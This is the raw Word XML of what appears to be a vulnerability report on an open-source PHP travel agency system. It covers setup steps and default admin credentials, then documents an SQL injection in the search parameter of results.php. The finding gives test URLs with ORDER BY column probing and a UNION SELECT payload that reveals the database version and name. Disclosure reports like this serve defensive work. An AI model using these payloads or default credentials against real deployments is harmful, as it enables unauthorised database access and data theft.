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b/>
          <w:bCs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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Installation Steps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b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Project Address</w:t>
      </w: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:</w:t>
      </w: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>https://github.com/ashraf-kabir/travel-agency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Start Apache and MySQL in phpStudy.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Extract the downloaded source code to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> directory (you can rename the folder if needed).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Create a database named "tagency" via the visual database management panel.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Import the SQL file from the extracted package. The file is named "tagency.sql" and located in the sql folder.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Access the Online Travel Agency System through a browser, e.g., http://localhost/travel/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t>If an error occurs on the admin page, simply copy the "includes" folder to the "admin_area" directory.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5264785" cy="886460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="4" name="图片 4" descr="屏幕截图 2025-11-06 221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06 2218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Admin Access Information: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>to access admin panel: http://localhost/travel/admin_area/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 xml:space="preserve">Email: admin@gmail.com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>Password: admin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b/>
          <w:bCs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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Vulnerability Information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Vulnerability Type: SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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Vulnerability</w:t>
      </w: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URL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/travel/(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Search Box Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)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Theme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Test Statement</w:t>
      </w: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en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/travel/results.php?user_query=' ORDER BY 8 --+ &amp;search=Search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en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/travel/results.php?user_query=' ORDER BY 9 --+ &amp;search=Search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en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://localhost/travel/results.php?user_query=-1' union select 1,2,3,version(),database(),6,7,8 --+ &amp;search=Search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="2691130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Theme="minorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="233997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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5252085" cy="2888615"/>
            <wp:effectExtent l="0" t="0" r="571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eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Some database information can be viewed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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0577CE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1B0577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2MWJhNmQ0ZmMxZDE4NDgzMDIyZjI2MGU1ZGI1M2IifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="65FF5C05"/>
    <w:rsid w:val="65FF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2025-11-08T03:39:00Z</dcterms:created>
  <dc:creator>王思怡</dc:creator>
  <cp:lastModifiedBy>王思怡</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-08T03:55:09Z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D7B41833CE5D472CAD5DF2430757FA9B</vt:lpwstr>
  </property>
</Properties>
</file>